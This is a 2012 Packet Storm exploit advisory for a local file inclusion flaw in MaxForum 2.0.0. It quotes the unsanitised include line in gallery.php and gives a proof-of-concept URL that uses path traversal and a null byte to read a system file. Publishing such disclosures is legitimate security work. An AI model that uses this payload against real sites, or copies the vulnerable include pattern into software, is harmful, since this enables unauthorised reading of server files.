MaxForum 2.0.0 Local File Inclusion

2012-09-26T00:00:00
ID PACKETSTORM:116870
Type packetstorm
Reporter L0n3ly-H34rT
Modified 2012-09-26T00:00:00

Description

                                        
                                            `############################################  
### Exploit Title: MaxForum v2.0.0 Local File Inclusion Vulnerability  
### Date: 25/09/2012   
### Author: L0n3ly-H34rT   
### Contact: l0n3ly_h34rt@hotmail.com   
### My Site: http://se3c.blogspot.com/   
### Vendor Link: http://www.max4dev.com/demo/ar/  
### Software Link: http://sourceforge.net/projects/maxforum/files/2.0.0/Max_v2.0.0.zip/download  
### Version : 2.0.0 ( may be old version is affect! i don't check )  
### Tested on: Linux/Windows   
############################################  
  
# Affected file ( includes/pages/gallery.php ) on line 42 :  
  
include 'gallery/' . $_GET['act'] . '.php';  
  
# P.O.C :  
  
http://127.0.0.1/max2/index.php?act=../../../../../../../boot.ini%00&page=gallery  
  
############################################  
  
# Note :  
  
Must be magic_quotes_gpc = Off  
  
# Greetz to my friendz  
`